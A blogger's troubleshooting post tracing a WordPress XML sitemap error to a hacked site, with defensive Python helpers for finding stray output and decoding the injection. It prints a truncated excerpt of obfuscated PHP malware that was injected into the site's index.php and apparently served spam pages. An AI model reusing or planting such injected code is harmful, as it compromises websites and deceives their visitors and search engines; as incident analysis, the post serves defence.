How a Mere XML Sitemap Error Revealed a Shocking Fact
Introduction
An XML sitemap helps search engines crawl and index your blog. As a full-time network engineer and hobby blogger, I did not have much time to build my own sitemap. So, like many bloggers out there, I used a plugin to generate it.
This article shows how a simple XML sitemap error can hide more than you think.
XML Sitemap error
For more than three months, I had been getting a weird XML sitemap error message:
XML declaration allowed only at the start of the document
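This error means the parser found something (whitespace, a byte-order mark or other stray output) in front of the `<?xml` declaration. If you want to see what exactly sits there, a minimal Python sketch like the following could help. It assumes you have already downloaded the sitemap response as raw bytes; the function name `bytes_before_xml_declaration` and the sample body are made up for illustration.

```python
def bytes_before_xml_declaration(body: bytes) -> bytes:
    """Return whatever precedes the first '<?xml' in a response body.

    An empty result means the declaration sits at the very start, as XML
    requires. Raises ValueError if the body has no declaration at all.
    """
    position = body.find(b"<?xml")
    if position == -1:
        raise ValueError("no XML declaration found")
    return body[:position]


if __name__ == "__main__":
    # Hypothetical sample: one blank line slipped in before the declaration.
    sample = b'\n<?xml version="1.0" encoding="UTF-8"?><urlset></urlset>'
    print(repr(bytes_before_xml_declaration(sample)))
```

Anything other than an empty result is output that was written before the sitemap itself, which is the thing to hunt for.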

I first thought it was due to the Yoast SEO plugin, so I deactivated the Yoast-generated XML sitemap and installed another sitemap plugin, which generated a correct (at least to my eyes) XML sitemap.
However, Google Search Console still flagged my blog as a Soft 404. I spent whole weekends and vacation days trying to reverse-engineer the reason behind this rejection.

All the articles I read pointed to “thin content” or “redirecting 404 error” pages.
I was not really convinced.
So I tried something else: I removed my blog from AdSense and resubmitted it. Google rejected it again, telling me there was something wrong:

Searching for solutions
After endless searching on the Internet, I read on Stack Overflow that stray whitespace might have slipped into the functions.php file:



So I went through all the PHP files of my WordPress theme and looked for leading and trailing whitespace. I also pasted the PHP code from the above-mentioned solution into the theme’s index.php. No success.
Then I deactivated all my WordPress plugins except Yoast and tried to generate the XML sitemap again. No success.
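Checking every file by hand is tedious, so here is a minimal Python sketch of the same search. It assumes the theme files are available locally; `stray_output_issues` and `scan_theme` are hypothetical helper names, and the checks are heuristics, not a full PHP parser.

```python
from pathlib import Path

UTF8_BOM = b"\xef\xbb\xbf"


def stray_output_issues(data: bytes) -> list[str]:
    """List reasons why a PHP file's contents would emit stray output."""
    issues = []
    if data.startswith(UTF8_BOM):
        issues.append("starts with a UTF-8 byte-order mark")
    elif data[:1].isspace():
        issues.append("whitespace before the opening tag")
    stripped = data.rstrip()
    # PHP swallows one newline directly after '?>'; anything more is output.
    if stripped.endswith(b"?>") and data[len(stripped):] not in (b"", b"\n", b"\r\n"):
        issues.append("extra whitespace after the closing '?>'")
    return issues


def scan_theme(theme_dir: str) -> dict[str, list[str]]:
    """Check every .php file under theme_dir and return only the flagged ones."""
    flagged = {}
    for path in sorted(Path(theme_dir).rglob("*.php")):
        issues = stray_output_issues(path.read_bytes())
        if issues:
            flagged[str(path)] = issues
    return flagged
```

Calling `scan_theme` on a local copy of the theme folder returns a dictionary of suspicious files. An empty dictionary only rules out this one cause, as the rest of this story shows.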
By pure coincidence (or maybe good attention to detail, LOL), I noticed something visually weird in the index.php file in the root folder of my blog’s web server. When I opened it in Notepad, there were strange characters:
<?php
$O0__OOO0_0='BEGINJ6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW';
$O0_0OO_O0_='granule';
$O__0OOO00_='1000147';
$O0_OO_O0_0=1160;
$O__O0O_00O='/bamboo\/(\d+)_birch_(\d+)\.jsp/is';
$O_0_OO_0O0='bamboo/{G}_birch_{L}.jsp';
$O__OO00O_0=1103;
$O0_0OOO_0_='atlantic.php';
$OOO0__0_0O=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O_OO_00O_0=$OOO0__0_0O{26}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{26}.$OOO0__0_0O{30}.$OOO0__0_0O{38}.$OOO0__0_0O{6}.$OOO0__0_0O{18}.$OOO0__0_0O{23}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{2}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{10};$O__0_0O0OO=$OOO0__0_0O{16}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{27}.$OOO0__0_0O{29}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{16}.$OOO0__0_0O{23}.$OOO0__0_0O{6}.$OOO0__0_0O{32}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{6}.$OOO0__0_0O{23}.$OOO0__0_0O{23}.$OOO0__0_0O{3}.$OOO0__0_0O{6}.$OOO0__0_0O{32}.$OOO0__0_0O{25};$O__0_OO00O=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{35}.$OOO0__0_0O{32}.$OOO0__0_0O{25}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{23}.$OOO0__0_0O{12}.$OOO0__0_0O{30}.$OOO0__0_0O{0}.$OOO0__0_0O{10};$O0__0O0OO_=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{27}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{6}.$OOO0__0_0O{29}.$OOO0__0_0O{26}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{6};$O0O0_O0__O=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{3}.$OOO0__0_0O{23}.$OOO0__0_0O{35}.$OOO0__0_0O{32}.$OOO0__0_0O{25}.$OOO0__0_0O{12}.$OOO0__0_0O{0}.$OOO0__0_0O{27};$OO_O0_0O_0=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{
30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{35}.$OOO0__0_0O{18}.$OOO0__0_0O{10};$O0OO0__0_O=$OOO0__0_0O{12}.$OOO0__0_0O{27}.$OOO0__0_0O{0}.$OOO0__0_0O{35}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{18}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{24}.$OOO0__0_0O{29}.$OOO0__0_0O{6}.$OOO0__0_0O{3}.$OOO0__0_0O{35}.$OOO0__0_0O{24}.$OOO0__0_0O{10};$O0_O__00OO=$OOO0__0_0O{38}.$OOO0__0_0O{12}.$OOO0__0_0O{23}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{16}.$OOO0__0_0O{18}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{10}.$OOO0__0_0O{30}.$OOO0__0_0O{0}.$OOO0__0_0O{10}.$OOO0__0_0O{33};$OO_00__0OO=$OOO0__0_0O{31}.$OOO0__0_0O{10}.$OOO0__0_0O{10}.$OOO0__0_0O{16}.$OOO0__0_0O{29}.$OOO0__0_0O{3}.$OOO0__0_0O{18}.$OOO0__0_0O{12}.$OOO0__0_0O{23}.$OOO0__0_0O{26}.$OOO0__0_0O{29}.$OOO0__0_0O{19}.$OOO0__0_0O{18}.$OOO0__0_0O{30}.$OOO0__0_0O{24}.$OOO0__0_0O{20};$O0_0_O0O_O=$OOO0__0_0O{38}.$OOO0__0_0O{18}.$OOO0__0_0O{0}.$OOO0__0_0O{32}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{29}.$OOO0__0_0O{30}.$OOO0__0_0O{17}.$OOO0__0_0O{12}.$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{33};$O0O_OO__00=$OOO0__0_0O{32}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{38}.$OOO0__0_0O{18}.$OOO0__0_0O{0}.$OOO0__0_0O{32}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{35}.$OOO0__0_0O{0};$OO0OO0__0_=$OOO0__0_0O{33}.$OOO0__0_0O{18}.$OOO0__0_0O{3}.$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{29}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{16}.$OOO0__0_0O{23}.$OOO0__0_0O{6}.$OOO0__0_0O{32}.$OOO0__0_0O{30};$OOO__00O_0=$OOO0__0_0O{33}.$OOO0__0_0O{35}.$OOO0__0_0O{32}.$OOO0__0_0O{25}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{0}.$OOO0__0_0O{30}.$OOO0__0_0O{32}.$OOO0__0_0O{10};$O_0O__0O0O=$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{
10}.$OOO0__0_0O{29}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{23}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{12}.$OOO0__0_0O{10};$O_00O0O_O_=$OOO0__0_0O{16}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{27}.$OOO0__0_0O{29}.$OOO0__0_0O{5}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{32}.$OOO0__0_0O{31}.$OOO0__0_0O{29}.$OOO0__0_0O{6}.$OOO0__0_0O{23}.$OOO0__0_0O{23};$OOOO0_0__0=$OOO0__0_0O{27}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{31}.$OOO0__0_0O{35}.$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{3}.$OOO0__0_0O{20}.$OOO0__0_0O{0}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{30};$O0O__0_OO0=$OOO0__0_0O{3}.$OOO0__0_0O{6}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{22}.$OOO0__0_0O{36}.$OOO0__0_0O{29}.$OOO0__0_0O{26}.$OOO0__0_0O{30}.$OOO0__0_0O{32}.$OOO0__0_0O{35}.$OOO0__0_0O{26}.$OOO0__0_0O{30};$O0O_0O_0O_=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{29}.
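The long chains of `{N}` lookups are less mysterious than they look: the `urldecode()` string is a lookup table, and each variable is assembled from it one character at a time. Below is a minimal Python sketch that decodes the table and rebuilds such a string without running any of the PHP. The names `ENCODED_TABLE`, `TABLE` and `resolve` are my own; only the encoded string and the index numbers come from the listing above.

```python
import re
from urllib.parse import unquote_plus

# Percent-encoded lookup table copied from the urldecode() call in the listing.
ENCODED_TABLE = (
    "%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B"
    "%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A"
)

# unquote_plus mirrors PHP's urldecode(), which also turns '+' into a space.
TABLE = unquote_plus(ENCODED_TABLE)


def resolve(expression: str) -> str:
    """Rebuild the string spelled by a chain of '$var{N}' lookups."""
    indices = re.findall(r"\{(\d+)\}", expression)
    return "".join(TABLE[int(i)] for i in indices)


if __name__ == "__main__":
    # Index numbers of the first assignment after the urldecode() call,
    # written without the repeated variable name.
    first = (
        "{26}{6}{10}{30}{29}{26}{30}{38}{6}{18}{23}{10}{29}"
        "{10}{12}{5}{30}{2}{35}{0}{30}{29}{33}{30}{10}"
    )
    print(resolve(first))
```

The first two assignments resolve to `date_default_timezone_set` and `preg_replace_callback`: ordinary PHP function names, built at runtime so that a plain-text search of the file does not find them.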
Running a quick Google search to check the indexing status of my blog, I was shocked to see Chinese characters on my site:


What the fuck are Chinese characters doing on my blog?
Then I remembered an incident from last October, when I received a notification from Google Webmaster Console that someone had been added as a property owner:

Since I was on public transport on my way to work (and I have no time for blogging during the day), I could not do anything until late that evening. I removed a weird TXT file from the root of the server and changed my passwords. I thought I had solved the issue and defeated the hacker.
Wrong! Now I am convinced that my blog was hacked and left with hidden anomalies!
My first instinct was to back up the infected index.php, delete the “alien” characters and get a clean index.php file again:
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
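Cleaning a file by hand makes it easy to miss a line. One way to double-check is to compare the file with the same file from a fresh WordPress download. This is a minimal Python sketch, assuming you have such a reference copy of the same WordPress version; `injected_lines` is a hypothetical helper name.

```python
import difflib


def injected_lines(site_text: str, reference_text: str) -> list[str]:
    """Lines present in the site's file but absent from the reference copy."""
    diff = difflib.ndiff(reference_text.splitlines(), site_text.splitlines())
    # ndiff marks lines that exist only in the second sequence with '+ '.
    return [line[2:] for line in diff if line.startswith("+ ")]
```

Feed it the text of the live index.php and of the reference index.php. An empty list means the two files have the same lines; anything else is worth a close look before you trust the file again.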
I generated the Yoast XML Sitemap file again. Bingo!

And Google is now happy with my new results (the message below is in German and means “indexing requested”):

Conclusion
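In my case, the solution to the error “XML declaration allowed only at the start of the document” was to repair a corrupted index.php file. The injected code at the top of index.php presumably produced output ahead of the sitemap, so the XML declaration was no longer at the start of the document. I don’t know how I missed this thing. Maybe I need to consider a course on WordPress security.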
References
- https://github.com/Yoast/wordpress-seo/issues/7105
- https://yoast.com/help/how-to-check-for-plugin-conflicts/
- https://stackoverflow.com/questions/5479533/problem-xml-declaration-allowed-only-at-the-start-of-the-document
- https://stackoverflow.com/questions/14685893/xml-declaration-allowed-only-at-the-start-of-the-document
- https://www.searchenginejournal.com/google-search-console-index-coverage-report-guide/346514/
- https://support.google.com/webmasters/answer/181708?
- https://www.reliablesoft.net/soft-404/
- https://www.hallaminternet.com/what-are-soft-404-errors-will-they-affect-rankings/
- https://seo-radio.de/google-behandelt-ausverkaufte-produktseiten-als-soft-404/
- https://pepperlandmarketing.com/blog/fix-soft-404-errors/
- https://forum.webflow.com/t/submitted-url-seems-to-be-a-soft-404/53674